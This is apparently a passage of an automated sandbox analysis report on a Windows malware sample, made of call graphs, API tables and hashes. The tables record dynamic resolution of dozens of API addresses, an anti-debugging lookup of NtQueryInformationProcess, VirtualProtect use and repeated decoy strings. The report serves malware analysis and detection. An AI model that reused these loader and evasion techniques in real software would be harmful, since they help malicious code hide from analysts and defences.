14166->14167 14168 de2fb0 14167->14168 14169 de45c0 2 API calls 14168->14169 14170 de2fc9 14169->14170 14171 de45c0 2 API calls 14170->14171 14172 de2fe2 14171->14172 14173 de45c0 2 API calls 14172->14173 14174 de2ffb 14173->14174 14175 de45c0 2 API calls 14174->14175 14176 de3014 14175->14176 14177 de45c0 2 API calls 14176->14177 14178 de302d 14177->14178 14179 de45c0 2 API calls 14178->14179 14180 de3046 14179->14180 14181 de45c0 2 API calls 14180->14181 14182 de305f 14181->14182 14183 de45c0 2 API calls 14182->14183 14184 de3078 14183->14184 14185 de45c0 2 API calls 14184->14185 14186 de3091 14185->14186 14187 de45c0 2 API calls 14186->14187 14188 de30aa 14187->14188 14189 de45c0 2 API calls 14188->14189 14190 de30c3 14189->14190 14191 de45c0 2 API calls 14190->14191 14192 de30dc 14191->14192 14193 de45c0 2 API calls 14192->14193 14194 de30f5 14193->14194 14195 de45c0 2 API calls 14194->14195 14196 de310e 14195->14196 14197 de45c0 2 API calls 14196->14197 14198 de3127 14197->14198 14199 de45c0 2 API calls 14198->14199 14200 de3140 14199->14200 14201 de45c0 2 API calls 14200->14201 14202 de3159 14201->14202 14203 de45c0 2 API calls 14202->14203 14204 de3172 14203->14204 14205 de45c0 2 API calls 14204->14205 14206 de318b 14205->14206 14207 de45c0 2 API calls 14206->14207 14208 de31a4 14207->14208 14209 de45c0 2 API calls 14208->14209 14210 de31bd 14209->14210 14211 de45c0 2 API calls 14210->14211 14212 de31d6 14211->14212 14213 de45c0 2 API calls 14212->14213 14214 de31ef 14213->14214 14215 de45c0 2 API calls 14214->14215 14216 de3208 14215->14216 14217 de45c0 2 API calls 14216->14217 14218 de3221 14217->14218 14219 de45c0 2 API calls 14218->14219 14220 de323a 14219->14220 14221 de45c0 2 API calls 14220->14221 14222 de3253 14221->14222 14223 de45c0 2 API calls 14222->14223 14224 de326c 14223->14224 14225 de45c0 2 API calls 14224->14225 14226 de3285 14225->14226 14227 de45c0 2 API calls 14226->14227 14228 de329e 14227->14228 14229 de45c0 2 API calls 14228->14229 
14230 de32b7 14229->14230 14231 de45c0 2 API calls 14230->14231 14232 de32d0 14231->14232 14233 de45c0 2 API calls 14232->14233 14234 de32e9 14233->14234 14235 de45c0 2 API calls 14234->14235 14236 de3302 14235->14236 14237 de45c0 2 API calls 14236->14237 14238 de331b 14237->14238 14239 de45c0 2 API calls 14238->14239 14240 de3334 14239->14240 14241 de45c0 2 API calls 14240->14241 14242 de334d 14241->14242 14243 de45c0 2 API calls 14242->14243 14244 de3366 14243->14244 14245 de45c0 2 API calls 14244->14245 14246 de337f 14245->14246 14247 de45c0 2 API calls 14246->14247 14248 de3398 14247->14248 14249 de45c0 2 API calls 14248->14249 14250 de33b1 14249->14250 14251 de45c0 2 API calls 14250->14251 14252 de33ca 14251->14252 14253 de45c0 2 API calls 14252->14253 14254 de33e3 14253->14254 14255 de45c0 2 API calls 14254->14255 14256 de33fc 14255->14256 14257 de45c0 2 API calls 14256->14257 14258 de3415 14257->14258 14259 de45c0 2 API calls 14258->14259 14260 de342e 14259->14260 14261 de45c0 2 API calls 14260->14261 14262 de3447 14261->14262 14263 de45c0 2 API calls 14262->14263 14264 de3460 14263->14264 14265 de45c0 2 API calls 14264->14265 14266 de3479 14265->14266 14267 de45c0 2 API calls 14266->14267 14268 de3492 14267->14268 14269 de45c0 2 API calls 14268->14269 14270 de34ab 14269->14270 14271 de45c0 2 API calls 14270->14271 14272 de34c4 14271->14272 14273 de45c0 2 API calls 14272->14273 14274 de34dd 14273->14274 14275 de45c0 2 API calls 14274->14275 14276 de34f6 14275->14276 14277 de45c0 2 API calls 14276->14277 14278 de350f 14277->14278 14279 de45c0 2 API calls 14278->14279 14280 de3528 14279->14280 14281 de45c0 2 API calls 14280->14281 14282 de3541 14281->14282 14283 de45c0 2 API calls 14282->14283 14284 de355a 14283->14284 14285 de45c0 2 API calls 14284->14285 14286 de3573 14285->14286 14287 de45c0 2 API calls 14286->14287 14288 de358c 14287->14288 14289 de45c0 2 API calls 14288->14289 14290 de35a5 14289->14290 14291 de45c0 2 API calls 14290->14291 14292 de35be 
14291->14292 14293 de45c0 2 API calls 14292->14293 14294 de35d7 14293->14294 14295 de45c0 2 API calls 14294->14295 14296 de35f0 14295->14296 14297 de45c0 2 API calls 14296->14297 14298 de3609 14297->14298 14299 de45c0 2 API calls 14298->14299 14300 de3622 14299->14300 14301 de45c0 2 API calls 14300->14301 14302 de363b 14301->14302 14303 de45c0 2 API calls 14302->14303 14304 de3654 14303->14304 14305 de45c0 2 API calls 14304->14305 14306 de366d 14305->14306 14307 de45c0 2 API calls 14306->14307 14308 de3686 14307->14308 14309 de45c0 2 API calls 14308->14309 14310 de369f 14309->14310 14311 de45c0 2 API calls 14310->14311 14312 de36b8 14311->14312 14313 de45c0 2 API calls 14312->14313 14314 de36d1 14313->14314 14315 de45c0 2 API calls 14314->14315 14316 de36ea 14315->14316 14317 de45c0 2 API calls 14316->14317 14318 de3703 14317->14318 14319 de45c0 2 API calls 14318->14319 14320 de371c 14319->14320 14321 de45c0 2 API calls 14320->14321 14322 de3735 14321->14322 14323 de45c0 2 API calls 14322->14323 14324 de374e 14323->14324 14325 de45c0 2 API calls 14324->14325 14326 de3767 14325->14326 14327 de45c0 2 API calls 14326->14327 14328 de3780 14327->14328 14329 de45c0 2 API calls 14328->14329 14330 de3799 14329->14330 14331 de45c0 2 API calls 14330->14331 14332 de37b2 14331->14332 14333 de45c0 2 API calls 14332->14333 14334 de37cb 14333->14334 14335 de45c0 2 API calls 14334->14335 14336 de37e4 14335->14336 14337 de45c0 2 API calls 14336->14337 14338 de37fd 14337->14338 14339 de45c0 2 API calls 14338->14339 14340 de3816 14339->14340 14341 de45c0 2 API calls 14340->14341 14342 de382f 14341->14342 14343 de45c0 2 API calls 14342->14343 14344 de3848 14343->14344 14345 de45c0 2 API calls 14344->14345 14346 de3861 14345->14346 14347 de45c0 2 API calls 14346->14347 14348 de387a 14347->14348 14349 de45c0 2 API calls 14348->14349 14350 de3893 14349->14350 14351 de45c0 2 API calls 14350->14351 14352 de38ac 14351->14352 14353 de45c0 2 API calls 14352->14353 14354 de38c5 14353->14354 
14355 de45c0 2 API calls 14354->14355 14356 de38de 14355->14356 14357 de45c0 2 API calls 14356->14357 14358 de38f7 14357->14358 14359 de45c0 2 API calls 14358->14359 14360 de3910 14359->14360 14361 de45c0 2 API calls 14360->14361 14362 de3929 14361->14362 14363 de45c0 2 API calls 14362->14363 14364 de3942 14363->14364 14365 de45c0 2 API calls 14364->14365 14366 de395b 14365->14366 14367 de45c0 2 API calls 14366->14367 14368 de3974 14367->14368 14369 de45c0 2 API calls 14368->14369 14370 de398d 14369->14370 14371 de45c0 2 API calls 14370->14371 14372 de39a6 14371->14372 14373 de45c0 2 API calls 14372->14373 14374 de39bf 14373->14374 14375 de45c0 2 API calls 14374->14375 14376 de39d8 14375->14376 14377 de45c0 2 API calls 14376->14377 14378 de39f1 14377->14378 14379 de45c0 2 API calls 14378->14379 14380 de3a0a 14379->14380 14381 de45c0 2 API calls 14380->14381 14382 de3a23 14381->14382 14383 de45c0 2 API calls 14382->14383 14384 de3a3c 14383->14384 14385 de45c0 2 API calls 14384->14385 14386 de3a55 14385->14386 14387 de45c0 2 API calls 14386->14387 14388 de3a6e 14387->14388 14389 de45c0 2 API calls 14388->14389 14390 de3a87 14389->14390 14391 de45c0 2 API calls 14390->14391 14392 de3aa0 14391->14392 14393 de45c0 2 API calls 14392->14393 14394 de3ab9 14393->14394 14395 de45c0 2 API calls 14394->14395 14396 de3ad2 14395->14396 14397 de45c0 2 API calls 14396->14397 14398 de3aeb 14397->14398 14399 de45c0 2 API calls 14398->14399 14400 de3b04 14399->14400 14401 de45c0 2 API calls 14400->14401 14402 de3b1d 14401->14402 14403 de45c0 2 API calls 14402->14403 14404 de3b36 14403->14404 14405 de45c0 2 API calls 14404->14405 14406 de3b4f 14405->14406 14407 de45c0 2 API calls 14406->14407 14408 de3b68 14407->14408 14409 de45c0 2 API calls 14408->14409 14410 de3b81 14409->14410 14411 de45c0 2 API calls 14410->14411 14412 de3b9a 14411->14412 14413 de45c0 2 API calls 14412->14413 14414 de3bb3 14413->14414 14415 de45c0 2 API calls 14414->14415 14416 de3bcc 14415->14416 14417 de45c0 2 
API calls 14416->14417 14418 de3be5 14417->14418 14419 de45c0 2 API calls 14418->14419 14420 de3bfe 14419->14420 14421 de45c0 2 API calls 14420->14421 14422 de3c17 14421->14422 14423 de45c0 2 API calls 14422->14423 14424 de3c30 14423->14424 14425 de45c0 2 API calls 14424->14425 14426 de3c49 14425->14426 14427 de45c0 2 API calls 14426->14427 14428 de3c62 14427->14428 14429 de45c0 2 API calls 14428->14429 14430 de3c7b 14429->14430 14431 de45c0 2 API calls 14430->14431 14432 de3c94 14431->14432 14433 de45c0 2 API calls 14432->14433 14434 de3cad 14433->14434 14435 de45c0 2 API calls 14434->14435 14436 de3cc6 14435->14436 14437 de45c0 2 API calls 14436->14437 14438 de3cdf 14437->14438 14439 de45c0 2 API calls 14438->14439 14440 de3cf8 14439->14440 14441 de45c0 2 API calls 14440->14441 14442 de3d11 14441->14442 14443 de45c0 2 API calls 14442->14443 14444 de3d2a 14443->14444 14445 de45c0 2 API calls 14444->14445 14446 de3d43 14445->14446 14447 de45c0 2 API calls 14446->14447 14448 de3d5c 14447->14448 14449 de45c0 2 API calls 14448->14449 14450 de3d75 14449->14450 14451 de45c0 2 API calls 14450->14451 14452 de3d8e 14451->14452 14453 de45c0 2 API calls 14452->14453 14454 de3da7 14453->14454 14455 de45c0 2 API calls 14454->14455 14456 de3dc0 14455->14456 14457 de45c0 2 API calls 14456->14457 14458 de3dd9 14457->14458 14459 de45c0 2 API calls 14458->14459 14460 de3df2 14459->14460 14461 de45c0 2 API calls 14460->14461 14462 de3e0b 14461->14462 14463 de45c0 2 API calls 14462->14463 14464 de3e24 14463->14464 14465 de45c0 2 API calls 14464->14465 14466 de3e3d 14465->14466 14467 de45c0 2 API calls 14466->14467 14468 de3e56 14467->14468 14469 de45c0 2 API calls 14468->14469 14470 de3e6f 14469->14470 14471 de45c0 2 API calls 14470->14471 14472 de3e88 14471->14472 14473 de45c0 2 API calls 14472->14473 14474 de3ea1 14473->14474 14475 de45c0 2 API calls 14474->14475 14476 de3eba 14475->14476 14477 de45c0 2 API calls 14476->14477 14478 de3ed3 14477->14478 14479 de45c0 2 API calls 
14478->14479 14480 de3eec 14479->14480 14481 de45c0 2 API calls 14480->14481 14482 de3f05 14481->14482 14483 de45c0 2 API calls 14482->14483 14484 de3f1e 14483->14484 14485 de45c0 2 API calls 14484->14485 14486 de3f37 14485->14486 14487 de45c0 2 API calls 14486->14487 14488 de3f50 14487->14488 14489 de45c0 2 API calls 14488->14489 14490 de3f69 14489->14490 14491 de45c0 2 API calls 14490->14491 14492 de3f82 14491->14492 14493 de45c0 2 API calls 14492->14493 14494 de3f9b 14493->14494 14495 de45c0 2 API calls 14494->14495 14496 de3fb4 14495->14496 14497 de45c0 2 API calls 14496->14497 14498 de3fcd 14497->14498 14499 de45c0 2 API calls 14498->14499 14500 de3fe6 14499->14500 14501 de45c0 2 API calls 14500->14501 14502 de3fff 14501->14502 14503 de45c0 2 API calls 14502->14503 14504 de4018 14503->14504 14505 de45c0 2 API calls 14504->14505 14506 de4031 14505->14506 14507 de45c0 2 API calls 14506->14507 14508 de404a 14507->14508 14509 de45c0 2 API calls 14508->14509 14510 de4063 14509->14510 14511 de45c0 2 API calls 14510->14511 14512 de407c 14511->14512 14513 de45c0 2 API calls 14512->14513 14514 de4095 14513->14514 14515 de45c0 2 API calls 14514->14515 14516 de40ae 14515->14516 14517 de45c0 2 API calls 14516->14517 14518 de40c7 14517->14518 14519 de45c0 2 API calls 14518->14519 14520 de40e0 14519->14520 14521 de45c0 2 API calls 14520->14521 14522 de40f9 14521->14522 14523 de45c0 2 API calls 14522->14523 14524 de4112 14523->14524 14525 de45c0 2 API calls 14524->14525 14526 de412b 14525->14526 14527 de45c0 2 API calls 14526->14527 14528 de4144 14527->14528 14529 de45c0 2 API calls 14528->14529 14530 de415d 14529->14530 14531 de45c0 2 API calls 14530->14531 14532 de4176 14531->14532 14533 de45c0 2 API calls 14532->14533 14534 de418f 14533->14534 14535 de45c0 2 API calls 14534->14535 14536 de41a8 14535->14536 14537 de45c0 2 API calls 14536->14537 14538 de41c1 14537->14538 14539 de45c0 2 API calls 14538->14539 14540 de41da 14539->14540 14541 de45c0 2 API calls 14540->14541 
14542 de41f3 14541->14542 14543 de45c0 2 API calls 14542->14543 14544 de420c 14543->14544 14545 de45c0 2 API calls 14544->14545 14546 de4225 14545->14546 14547 de45c0 2 API calls 14546->14547 14548 de423e 14547->14548 14549 de45c0 2 API calls 14548->14549 14550 de4257 14549->14550 14551 de45c0 2 API calls 14550->14551 14552 de4270 14551->14552 14553 de45c0 2 API calls 14552->14553 14554 de4289 14553->14554 14555 de45c0 2 API calls 14554->14555 14556 de42a2 14555->14556 14557 de45c0 2 API calls 14556->14557 14558 de42bb 14557->14558 14559 de45c0 2 API calls 14558->14559 14560 de42d4 14559->14560 14561 de45c0 2 API calls 14560->14561 14562 de42ed 14561->14562 14563 de45c0 2 API calls 14562->14563 14564 de4306 14563->14564 14565 de45c0 2 API calls 14564->14565 14566 de431f 14565->14566 14567 de45c0 2 API calls 14566->14567 14568 de4338 14567->14568 14569 de45c0 2 API calls 14568->14569 14570 de4351 14569->14570 14571 de45c0 2 API calls 14570->14571 14572 de436a 14571->14572 14573 de45c0 2 API calls 14572->14573 14574 de4383 14573->14574 14575 de45c0 2 API calls 14574->14575 14576 de439c 14575->14576 14577 de45c0 2 API calls 14576->14577 14578 de43b5 14577->14578 14579 de45c0 2 API calls 14578->14579 14580 de43ce 14579->14580 14581 de45c0 2 API calls 14580->14581 14582 de43e7 14581->14582 14583 de45c0 2 API calls 14582->14583 14584 de4400 14583->14584 14585 de45c0 2 API calls 14584->14585 14586 de4419 14585->14586 14587 de45c0 2 API calls 14586->14587 14588 de4432 14587->14588 14589 de45c0 2 API calls 14588->14589 14590 de444b 14589->14590 14591 de45c0 2 API calls 14590->14591 14592 de4464 14591->14592 14593 de45c0 2 API calls 14592->14593 14594 de447d 14593->14594 14595 de45c0 2 API calls 14594->14595 14596 de4496 14595->14596 14597 de45c0 2 API calls 14596->14597 14598 de44af 14597->14598 14599 de45c0 2 API calls 14598->14599 14600 de44c8 14599->14600 14601 de45c0 2 API calls 14600->14601 14602 de44e1 14601->14602 14603 de45c0 2 API calls 14602->14603 14604 de44fa 
14603->14604 14605 de45c0 2 API calls 14604->14605 14606 de4513 14605->14606 14607 de45c0 2 API calls 14606->14607 14608 de452c 14607->14608 14609 de45c0 2 API calls 14608->14609 14610 de4545 14609->14610 14611 de45c0 2 API calls 14610->14611 14612 de455e 14611->14612 14613 de45c0 2 API calls 14612->14613 14614 de4577 14613->14614 14615 de45c0 2 API calls 14614->14615 14616 de4590 14615->14616 14617 de45c0 2 API calls 14616->14617 14618 de45a9 14617->14618 14619 df9c10 14618->14619 14620 dfa036 8 API calls 14619->14620 14621 df9c20 43 API calls 14619->14621 14622 dfa0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14620->14622 14623 dfa146 14620->14623 14621->14620 14622->14623 14624 dfa216 14623->14624 14625 dfa153 8 API calls 14623->14625 14626 dfa21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14624->14626 14627 dfa298 14624->14627 14625->14624 14626->14627 14628 dfa337 14627->14628 14629 dfa2a5 6 API calls 14627->14629 14630 dfa41f 14628->14630 14631 dfa344 9 API calls 14628->14631 14629->14628 14632 dfa428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14630->14632 14633 dfa4a2 14630->14633 14631->14630 14632->14633 14634 dfa4dc 14633->14634 14635 dfa4ab GetProcAddress GetProcAddress 14633->14635 14636 dfa515 14634->14636 14637 dfa4e5 GetProcAddress GetProcAddress 14634->14637 14635->14634 14638 dfa612 14636->14638 14639 dfa522 10 API calls 14636->14639 14637->14636 14640 dfa67d 14638->14640 14641 dfa61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14638->14641 14639->14638 14642 dfa69e 14640->14642 14643 dfa686 GetProcAddress 14640->14643 14641->14640 14644 df5ca3 14642->14644 14645 dfa6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14642->14645 14643->14642 14646 de1590 14644->14646 14645->14644 15767 de1670 14646->15767 14649 dfa7a0 lstrcpy 14650 de15b5 14649->14650 14651 dfa7a0 lstrcpy 14650->14651 14652 de15c7 14651->14652 14653 dfa7a0 
lstrcpy 14652->14653 14654 de15d9 14653->14654 14655 dfa7a0 lstrcpy 14654->14655 14656 de1663 14655->14656 14657 df5510 14656->14657 14658 df5521 14657->14658 14659 dfa820 2 API calls 14658->14659 14660 df552e 14659->14660 14661 dfa820 2 API calls 14660->14661 14662 df553b 14661->14662 14663 dfa820 2 API calls 14662->14663 14664 df5548 14663->14664 14665 dfa740 lstrcpy 14664->14665 14666 df5555 14665->14666 14667 dfa740 lstrcpy 14666->14667 14668 df5562 14667->14668 14669 dfa740 lstrcpy 14668->14669 14670 df556f 14669->14670 14671 dfa740 lstrcpy 14670->14671 14692 df557c 14671->14692 14672 dfa740 lstrcpy 14672->14692 14673 dfa820 lstrlen lstrcpy 14673->14692 14674 dfa8a0 lstrcpy 14674->14692 14675 df5643 StrCmpCA 14675->14692 14676 df56a0 StrCmpCA 14677 df57dc 14676->14677 14676->14692 14679 dfa8a0 lstrcpy 14677->14679 14678 dfa7a0 lstrcpy 14678->14692 14680 df57e8 14679->14680 14681 dfa820 2 API calls 14680->14681 14682 df57f6 14681->14682 14685 dfa820 2 API calls 14682->14685 14683 df5856 StrCmpCA 14686 df5991 14683->14686 14683->14692 14684 df51f0 20 API calls 14684->14692 14687 df5805 14685->14687 14688 dfa8a0 lstrcpy 14686->14688 14690 de1670 lstrcpy 14687->14690 14689 df599d 14688->14689 14691 dfa820 2 API calls 14689->14691 14710 df5811 14690->14710 14693 df59ab 14691->14693 14692->14672 14692->14673 14692->14674 14692->14675 14692->14676 14692->14678 14692->14683 14692->14684 14694 df5a0b StrCmpCA 14692->14694 14695 df52c0 25 API calls 14692->14695 14706 df578a StrCmpCA 14692->14706 14709 df593f StrCmpCA 14692->14709 14711 de1590 lstrcpy 14692->14711 14696 dfa820 2 API calls 14693->14696 14697 df5a28 14694->14697 14698 df5a16 Sleep 14694->14698 14695->14692 14699 df59ba 14696->14699 14700 dfa8a0 lstrcpy 14697->14700 14698->14692 14701 de1670 lstrcpy 14699->14701 14702 df5a34 14700->14702 14701->14710 14703 dfa820 2 API calls 14702->14703 14704 df5a43 14703->14704 14705 dfa820 2 API calls 14704->14705 14707 df5a52 14705->14707 14706->14692 14708 de1670 

                              Control-flow Graph

                              APIs
                              • GetProcAddress.KERNEL32(75900000,019706C0), ref: 00DF98A1
                              • GetProcAddress.KERNEL32(75900000,019704F8), ref: 00DF98BA
                              • GetProcAddress.KERNEL32(75900000,01970420), ref: 00DF98D2
                              • GetProcAddress.KERNEL32(75900000,019705D0), ref: 00DF98EA
                              • GetProcAddress.KERNEL32(75900000,019705E8), ref: 00DF9903
                              • GetProcAddress.KERNEL32(75900000,01978970), ref: 00DF991B
                              • GetProcAddress.KERNEL32(75900000,01965C48), ref: 00DF9933
                              • GetProcAddress.KERNEL32(75900000,01965C68), ref: 00DF994C
                              • GetProcAddress.KERNEL32(75900000,01970438), ref: 00DF9964
                              • GetProcAddress.KERNEL32(75900000,01970450), ref: 00DF997C
                              • GetProcAddress.KERNEL32(75900000,01970498), ref: 00DF9995
                              • GetProcAddress.KERNEL32(75900000,019704B0), ref: 00DF99AD
                              • GetProcAddress.KERNEL32(75900000,01965B28), ref: 00DF99C5
                              • GetProcAddress.KERNEL32(75900000,01970510), ref: 00DF99DE
                              • GetProcAddress.KERNEL32(75900000,01970540), ref: 00DF99F6
                              • GetProcAddress.KERNEL32(75900000,01965C28), ref: 00DF9A0E
                              • GetProcAddress.KERNEL32(75900000,01970558), ref: 00DF9A27
                              • GetProcAddress.KERNEL32(75900000,01970798), ref: 00DF9A3F
                              • GetProcAddress.KERNEL32(75900000,01965B48), ref: 00DF9A57
                              • GetProcAddress.KERNEL32(75900000,019706D8), ref: 00DF9A70
                              • GetProcAddress.KERNEL32(75900000,01965B88), ref: 00DF9A88
                              • LoadLibraryA.KERNEL32(01970780,?,00DF6A00), ref: 00DF9A9A
                              • LoadLibraryA.KERNEL32(019706F0,?,00DF6A00), ref: 00DF9AAB
                              • LoadLibraryA.KERNEL32(01970768,?,00DF6A00), ref: 00DF9ABD
                              • LoadLibraryA.KERNEL32(01970708,?,00DF6A00), ref: 00DF9ACF
                              • LoadLibraryA.KERNEL32(01970720,?,00DF6A00), ref: 00DF9AE0
                              • GetProcAddress.KERNEL32(75070000,01970738), ref: 00DF9B02
                              • GetProcAddress.KERNEL32(75FD0000,01970750), ref: 00DF9B23
                              • GetProcAddress.KERNEL32(75FD0000,01978C28), ref: 00DF9B3B
                              • GetProcAddress.KERNEL32(75A50000,01978C40), ref: 00DF9B5D
                              • GetProcAddress.KERNEL32(74E50000,01965BC8), ref: 00DF9B7E
                              • GetProcAddress.KERNEL32(76E80000,01978A00), ref: 00DF9B9F
                              • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00DF9BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 00DF9BAA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: 74c18b6175e6f11182105e6b46c787b9a5394cd1c292a64d3abbf846db61e25f
                              • Instruction ID: 3ed7824e0451f198b87b7d0046de5d6d4ebe9940454edba671256a0ecf7e137f
                              • Opcode Fuzzy Hash: 74c18b6175e6f11182105e6b46c787b9a5394cd1c292a64d3abbf846db61e25f
                              • Instruction Fuzzy Hash: F5A13BB5700240DFD374DFA8EA88A6637F9F78C205724856AE686C3A4CDE7F9441CB64

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 764 de45c0-de4695 RtlAllocateHeap 781 de46a0-de46a6 764->781 782 de474f-de47a9 VirtualProtect 781->782 783 de46ac-de474a 781->783 783->781
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DE460E
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00DE479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE46B7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4765
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4657
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4683
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4729
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4678
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE46AC
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4617
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4734
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE475A
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE477B
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE45F3
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE471E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE466D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4662
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4643
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE45DD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4713
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE46C2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE474F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE45E8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE45D2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE4638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE46CD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE473F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE46D8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00DE45C7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp
